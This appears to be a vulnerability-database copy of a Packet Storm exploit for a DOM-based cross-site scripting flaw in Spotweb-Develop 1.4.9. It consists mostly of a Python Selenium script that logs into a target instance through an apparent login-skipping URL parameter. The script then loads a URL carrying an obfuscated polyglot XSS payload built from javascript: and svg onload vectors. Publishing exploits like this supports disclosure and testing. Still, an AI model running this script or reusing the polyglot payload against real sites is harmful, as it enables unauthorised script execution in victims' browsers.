Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
packetstormNu11secur1tyPACKETSTORM:162731
HistoryMay 20, 2021 - 12:00 a.m.

Spotweb-Develop 1.4.9 Cross Site Scripting

2021-05-2000:00:00
nu11secur1ty
packetstormsecurity.com
88
JSON
`# Exploit Title: Cross Site Scripting (DOM Based) spotweb-develop 1.4.9  
# Author: @nu11secur1ty  
# Testing and Debugging: nu11secur1ty $ OWASP-ZAP  
# Date: 05.20.2021  
# Vendor: https://www.nzbserver.com/  
# Link: https://github.com/spotweb/spotweb  
# CVE: 2021-XXXX  
# Proof: https://streamable.com/hix5o1  
  
[+] Exploit Source:  
#!/usr/bin/python3  
# Author: @nu11secur1ty  
# CVE-2021-XXXX  
  
from selenium import webdriver  
import time  
import os, sys  
  
  
# Vendor: https://www.nzbserver.com/  
# Jump over login form :D  
website_link="  
http://192.168.1.160/spotweb-develop/?page=login&data[htmlheaderssent]=true"  
  
# enter your login username  
username="nu11secur1ty"  
  
# enter your login password  
password="password"  
  
#enter the element for username input field  
element_for_username="loginform[username]"  
  
#enter the element for password input field  
element_for_password="loginform[password]"  
  
#enter the element for submit button  
element_for_submit="loginform[submitlogin]"  
  
  
#browser = webdriver.Safari() #for macOS users[for others use chrome vis  
chromedriver]  
browser = webdriver.Chrome() #uncomment this line,for chrome users  
#browser = webdriver.Firefox() #uncomment this line,for chrome users  
  
time.sleep(3)  
browser.get((website_link))  
  
try:  
username_element = browser.find_element_by_name(element_for_username)  
username_element.send_keys(username)  
password_element = browser.find_element_by_name(element_for_password)  
password_element.send_keys(password)  
signInButton = browser.find_element_by_name(element_for_submit)  
signInButton.click()  
  
# Exploit Cross Site Scripting (DOM Based)  
# Payload: #jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert()  
)//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e  
  
time.sleep(1)  
# Payload link "esc-rule"  
browser.get(("  
http://192.168.1.160/spotweb-develop#jaVasCript:/*-/*`/*\`/*'/*"'/**/(/*  
*/oNcliCk=alert()  
)//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e'""))  
  
print("The payload is deployed DOM is BOMing you ':))'...\n")  
os.system('pause')  
  
browser.close()  
  
except Exception:  
#### This exception occurs if the element are not found in the webpage.  
print("DOM...")  
  
---------------------------------  
  
# Exploit Title: Cross Site Scripting (DOM Based) spotweb-develop 1.4.9  
# Date: 05.20.2021  
# Exploit Authotr idea: nu11secur1ty  
# Exploit Debugging: nu11secur1ty & OWASP-ZAP  
# Vendor Homepage: https://www.nzbserver.com/  
# Software Link: https://github.com/spotweb/spotweb/releases  
  
# Steps to Reproduce:  
https://github.com/nu11secur1ty/CVE-mitre/tree/main/CVE-2021-SPOTWEB-SXX-DOM  
`
JSON